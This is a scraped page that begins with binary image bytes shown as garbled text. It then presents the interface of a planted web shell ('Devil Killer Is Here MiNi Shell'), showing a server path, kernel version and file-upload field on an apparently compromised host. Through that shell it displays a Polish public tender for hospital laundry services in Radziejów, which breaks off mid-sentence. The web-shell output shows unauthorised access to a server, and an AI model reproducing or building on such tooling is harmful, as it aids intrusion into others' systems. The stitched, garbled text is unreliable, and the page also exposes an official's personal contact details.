JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250618/0028457601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie kompleksowego prania bielizny i odzieży<br/>szpitalnej wraz z wynajmem pościeli szpitalnej i transportem na potrzeby<br/>SP ZOZ w Radziejowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910333036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szpitalna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radziejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@szpitalradziejow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpitalradziejow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie kompleksowego prania bielizny i odzieży<br/>szpitalnej wraz z wynajmem pościeli szpitalnej i transportem na potrzeby<br/>SP ZOZ w Radziejowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c6e51e58-d7bc-473b-bc58-41d079ad9c66</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00284576</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00027256/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usług w zakresie kompleksowego prania bielizny i odzieży szpitalnej wraz z wynajmem pościeli szpitalnej i transportem na potrzeby</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/szpitalradziejow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej tj. poprzez Platformę dostępną pod adresem:http://platformazakupowa.pl/pn/szpitalradziejow. - oferta, musi zostać przekazana wyłącznie za pomocą powyższej Platformy.3) Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem<br/>platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji,<br/>zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w<br/>sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami<br/>adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem<br/>platformazakupowa.pl do konkretnego Wykonawcy.<br/>4. Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptują regulamin korzystania z Platformy.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i<br/>wiadomości bezpośrednio - cd zgodnie z SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">6. Zgodnie z art. 67 ustawy p.z.p., Zamawiający podaje wymagania techniczne związane z<br/>korzystaniem z Platformy Zamawiający udostępnia poniżej informacje na temat specyfikacji<br/>połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i<br/>odbioru danych. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na Platformie e-Zamawiający, tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor<br/>Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7,<br/>10, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) Zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie<br/>wersja 10.0,<br/>4) Włączona obsługa JavaScript,<br/>5) Zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem<br/>Głównego Urzędu Miar.<br/>7. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie<br/>zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go<br/>za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>8. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z<br/>Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający<br/>zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce<br/>„Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie<br/>został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>9. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz<br/>innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl<br/>znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>10. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z<br/>“OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie<br/>ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”<br/>11. Zamawiający zaleca:<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów:<br/>a) .zip<br/>b) .7Z<br/>3) Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif<br/>.bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone<br/>nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem<br/>zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w<br/>aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację<br/>podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających<br/>się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>6) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. cd zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a) Mając na uwadze zapisy art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE, zwanym dalej „RODO”, poniżej przedstawiam informacje i zasady przetwarzania<br/>danych osobowych przez Samodzielny Publiczny Zakład Opieki Zdrowotnej w Radziejów<br/>Administratorem Pani/Pana danych osobowych jest Samodzielny Publiczny Zakład Opieki<br/>Zdrowotnej z siedzibą przy ul. Szpitalnej 3, 88-200 Radziejów , tel.: 54 285 62 00.<br/>1) Inspektor Ochrony Danych<br/>We wszelkich sprawach dotyczących przetwarzania danych osobowych przez<br/>Zamawiającego można kontaktować się z wyznaczonym w tym celu Inspektorem<br/>Ochrony Danych – Pani : kontakt: tel. Sylwia Bojanowska - Dekert tel.<br/>515 291 178 , e-mail: iod@szpitalradziejow.pl<br/>2) Cel przetwarzania<br/>Pani/Pana dane osobowe będą przetwarzane przez Zamawiającego w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego.<br/>3) Przechowywanie danych:<br/>Pani/Pana dane osobowe będą przechowywane, 78 ust. 1 ustawy Pzp, oraz zgodnie z<br/>jednolitym rzeczowym wykazem akt obowiązującym w Samodzielnym Publicznym<br/>Zakładzie Opieki Zdrowotnej w Radziejowie.<br/>4) Informacja o obowiązku podania danych:<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>5) Realizacja praw:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,٭<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art.. 18 ust. 2 RODO,٭٭<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6) Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest<br/>art. 6 ust. 1 lit. c RODO.<br/>7) Odbiorcy danych<br/>a) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r.<br/>poz. 1129 z późn. zm.).<br/>b) W oparciu o Pani/Pana dane osobowe Administrator nie będzie podejmował<br/>zautomatyzowanych decyzji w tym decyzji będących wynikiem profilowania.٭٭٭<br/> ٭skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp, oraz nie może<br/>naruszać integralności protokołu oraz jego załączników.<br/> ٭٭prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/> ٭٭٭profilowanie, oznacza dowolną formę zautomatyzowanego przetwarzania danych osobowych, które polega<br/>na wykorzystaniu danych osobowych do oceny niektórych czynników osobowych osoby fizycznej, w<br/>szczególności do analizy lub prognozy aspektów dotyczących pracy tej osoby fizycznej, jej sytuacji<br/>ekonomicznej, zdrowia, osobistych preferencji, zainteresowań, wiarygodności, zachowania, lokalizacji lub<br/>przemieszczania się.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP-08/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywne świadczenie usług w zakresie kompleksowego prania<br/>bielizny i odzieży szpitalnej wraz z transportem brudnej bielizny i odzieży z magazynu<br/>Zamawiającego oraz wynajmem pościeli szpitalnej (271 łóżek x 3,5 kpl.) do pralni Wykonawcy<br/>oraz transportem czystej bielizny z pralni Wykonawcy do magazynu Zamawiającego na potrzeby<br/>Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Radziejowie.2. Kody zamówienia według Wspólnego Słownika Zamówień (CPV):<br/>98310000-9 Usługi prania i czyszczenia na sucho<br/>98315000-4 Usługi prasowania<br/>98311000-6 Usługi odbierania prania<br/>98393000-4 Usługi krawieckie<br/>3. Szacunkowa ilość pranej bielizny szpitalnej oraz odzieży roboczej i ochronnej wynosi ok.<br/>4350 kg miesięcznie, co w skali 24 miesięcy stanowi ok 104 400,00kg. Szacunkowa ilość może<br/>ulec zmianie ± 20%.<br/>4. Do bielizny szpitalnej oraz odzieży roboczej i ochronnej objętej przedmiotem umowy zalicza się:<br/>1) bieliznę pościelową – poszwy na poduszki, poszwy na kołdry – na koce, prześcieradła.<br/>2) koce, kołdry,<br/>3) odzież roboczą i ochronną,<br/>4) odzież i bieliznę wydawaną na rzecz pacjentów szpitala,<br/>5) pokrowce różne, pokrowce specjalistyczne na materace przeciwodleżynowe,<br/>6) poduszki,<br/>7) inne (ręczniki, ścierki, obrusy, serwetki, piżamy, koszule, szlafroki, peleryny pielęgniarskie<br/>itp.)<br/>5. Bielizna pościelowa musi spełniać następujące wymagania :<br/>1) Zamawiający wymaga pościeli o następujących wymiarach:<br/>- na 258 łóżek:<br/>poszewki - 70 cm x 80 cm<br/>poszwy - 160 cm x 200 cm<br/>prześcieradła - 160 cm x 250 cm<br/>- na 13 łóżek Oddziału Pediatrycznego<br/>poszewki - 60 cmx 70 cm<br/>poszwy 8 szt. - 100 cm x 140 cm<br/>5 szt. - 90 cm x 110 cm<br/>prześcieradła 100 cm x 140 cm<br/>Przy zachowaniu przelicznika 3,5 kompletu na każde łóżko.<br/>2) Zamawiający wymaga pościeli o procentowym składzie:<br/>- bawełna – minimum 55%,<br/>- poliester – maksimum 45%<br/>- gramaturze minimum 150g/m2.<br/>Wykonawca w celu potwierdzenia spełnienia powyższych wymagań zobowiązany jest<br/>dołączyć Kartę Techniczną Tkaniny potwierdzającą skład chemiczny i gramaturę tkaniny do<br/>oferty.<br/>3) Preferowany jest kolor biały pościeli. Zamawiający nie wymaga, aby dzierżawiona pościel<br/>była nowa.<br/>6. Przedmiot zamówienia obejmuje:<br/>1) moczenie, pranie, suszenie, maglowanie lub prasowanie, wykańczanie, składanie oraz<br/>sortowanie bielizny szpitalnej, foliowanie odzieży, drobne naprawy krawieckie oraz<br/>transportowanie jej na wieszakach,<br/>2) Zamawiający dopuszcza zamiast foliowania odzieży dostarczanie jej zabezpieczonej np. w<br/>pokrowcach,<br/>3) dezynfekcja poduszek, kołder, koców, materacy i innego asortymentu,<br/>4) składanie i pakowanie czystej bielizny wg asortymentu,<br/>5) odbiór bielizny i odzieży brudnej z magazynu Zamawiającego oraz załadunek i transport na<br/>koszt Wykonawcy do jego pralni,<br/>6) dostarczenie własnym transportem i rozładunek czystej bielizny do magazynu tekstylnego<br/>Zamawiającego,<br/>7) wydanie Zamawiającemu po wykonaniu usługi, posegregowanych i zapakowanych<br/>poszczególnych asortymentów wypranej bielizny wraz z opisem asortymentowym, zgodnie z<br/>oznakowaniem Zamawiającego, bielizny szpitalnej wraz z wykazem zawierającym spis<br/>bielizny,8) technologiczne dostosowanie prania do rodzaju pranej bielizny i odzieży, zgodnie z<br/>zaleceniami producenta, nie powodując jej zniszczenia czy uszkodzenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98310000-9 - Usługi prania i czyszczenia na sucho</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">98315000-4 - Usługi prasowania</p> <p class="mb-0">98311000-6 - Usługi odbierania prania</p> <p class="mb-0">98393000-4 - Usługi krawieckie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek jeżeli przedstawi: opinię wystawioną przez Państwowego<br/>- właściwego ze względu na miejsce wykonania usługi – Inspektora Sanitarnego, że<br/>Wykonawca posiada pralnię posiadającą barierę higieniczną.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:Wykonawca spełni warunek jeżeli przedstawi: wykaz usług wykonanych, a w przypadku<br/>świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie usługę, co najmniej 1 usługę polegającą na świadczeniu usług pralniczych<br/>dla podmiotów leczniczych o wartości brutto min. 250.000,00 zł – wzór stanowi<br/>Załącznik nr 6 do SWZ.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – o ile dotyczy<br/>przedmiotowego postępowania - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada<br/>wymaganych 